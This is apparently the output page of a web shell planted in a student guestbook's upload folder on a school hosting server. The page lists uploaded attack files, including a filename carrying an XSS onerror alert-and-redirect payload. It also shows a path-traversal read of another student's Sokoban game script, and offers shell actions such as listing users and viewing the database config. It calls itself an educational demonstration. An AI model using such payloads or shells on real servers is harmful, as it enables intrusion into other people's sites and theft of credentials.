🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ./../../../public_html/../../585997.klas4s23.mid-ica.nl/public_html/sokoban/javascript/setup.js

var highscore;
if (getCookie("highscore") == "") highscore = 0;
else highscore = parseInt(getCookie("highscore"));
setCookie("highscore", highscore, 365);
document.getElementById("highscore").innerHTML = `Highscore: ${highscore}`;

function addOptions()
{
    document.getElementById("levelselect").innerHTML = '';

    for (let i = 1; i <= Math.min(maxLevel, highscore + 1); i++)
    {
        let option = document.createElement("option");
        option.text = `Level ${i}`;
        option.value = i;
        document.getElementById("levelselect").add(option);
    }
    // for (let i = 1; i <= 11; i++)
    // {
    //     let option = document.createElement("option");
    //     option.text = `Level ${i}`;
    //     option.value = i;
    //     document.getElementById("levelselect").add(option);
    // }
}

const canvas = document.getElementById("sokoban_game");
const ctx = canvas.getContext("2d");

function createImage(src)
{
    img = new Image();
    img.src = src;
    return img;
}

const floor = createImage('../game_images/floor.png');

const box = createImage('../game_images/box.png');
const box_green = createImage('../game_images/box_green.png');

const portal_red = createImage('../game_images/portal_red.png');
const portal_green = createImage('../game_images/portal_green.png');
const portal_blue = createImage('../game_images/portal_blue.png');

const player_up = createImage('../game_images/player_up.png');
const player_right = createImage('../game_images/player_right.png');
const player_down = createImage('../game_images/player_down.png');
const player_left = createImage('../game_images/player_left.png');

const wall_center = createImage('../game_images/wall_center.png');
const wall_left = createImage('../game_images/wall_left.png');
const wall_right = createImage('../game_images/wall_right.png');
const wall_both = createImage('../game_images/wall_both.png');

const goal_00 = createImage('../game_images/goal_00.png');
const goal_01 = createImage('../game_images/goal_01.png');
const goal_02 = createImage('../game_images/goal_02.png');
const goal_03 = createImage('../game_images/goal_03.png');
const goal_04 = createImage('../game_images/goal_04.png');
const goal_10 = createImage('../game_images/goal_10.png');
const goal_11 = createImage('../game_images/goal_11.png');
const goal_12 = createImage('../game_images/goal_12.png');
const goal_13 = createImage('../game_images/goal_13.png');
const goal_14 = createImage('../game_images/goal_14.png');
const goal_20 = createImage('../game_images/goal_20.png');
const goal_21 = createImage('../game_images/goal_21.png');
const goal_22 = createImage('../game_images/goal_22.png');
const goal_23 = createImage('../game_images/goal_23.png');
const goal_24 = createImage('../game_images/goal_24.png');
const goal_30 = createImage('../game_images/goal_30.png');
const goal_31 = createImage('../game_images/goal_31.png');
const goal_32 = createImage('../game_images/goal_32.png');
const goal_33 = createImage('../game_images/goal_33.png');
const goal_34 = createImage('../game_images/goal_34.png');

const win_text = createImage('../game_images/win_text.png');
const level_text = createImage('../game_images/level_text.png');

const zero_text = createImage('../game_images/zero_text.png');
const one_text = createImage('../game_images/one_text.png');
const two_text = createImage('../game_images/two_text.png');
const three_text = createImage('../game_images/three_text.png');
const four_text = createImage('../game_images/four_text.png');
const five_text = createImage('../game_images/five_text.png');
const six_text = createImage('../game_images/six_text.png');
const seven_text = createImage('../game_images/seven_text.png');
const eight_text = createImage('../game_images/eight_text.png');
const nine_text = createImage('../game_images/nine_text.png');

const dict_player = {
    0: player_up,
    1: player_right,
    2: player_down,
    3: player_left
}

const dict_goal_0 = {
    0: goal_00,
    1: goal_01,
    2: goal_02,
    3: goal_03,
    4: goal_04
}

const dict_goal_1 = {
    0: goal_10,
    1: goal_11,
    2: goal_12,
    3: goal_13,
    4: goal_14
}

const dict_goal_2 = {
    0: goal_20,
    1: goal_21,
    2: goal_22,
    3: goal_23,
    4: goal_24
}

const dict_goal_3 = {
    0: goal_30,
    1: goal_31,
    2: goal_32,
    3: goal_33,
    4: goal_34
}

const dict_portal = {
    0: portal_red,
    1: portal_green,
    2: portal_blue
}

const dict_wall = {
    0: wall_center,
    1: wall_left,
    2: wall_right,
    3: wall_both
}

const dict_text = {
    0: zero_text,
    1: one_text,
    2: two_text,
    3: three_text,
    4: four_text,
    5: five_text,
    6: six_text,
    7: seven_text,
    8: eight_text,
    9: nine_text
}

let playerX;
let playerY;
let playerRotation;

let mapW;
let mapH;

let cellW = 64;
let cellH = 64;

let mapTiles;

let tileData;

let boxData;

let portalData;

let portalPositions;

const maxLevel = 10;

let level = highscore + 1;

let win;

addOptions();

🎯 Available Actions

Command Execution:

Quick Commands:

📋 List files | 👤 Show user | 📍 Show directory | 🔄 Show processes | 🔐 Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | 🔍 View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!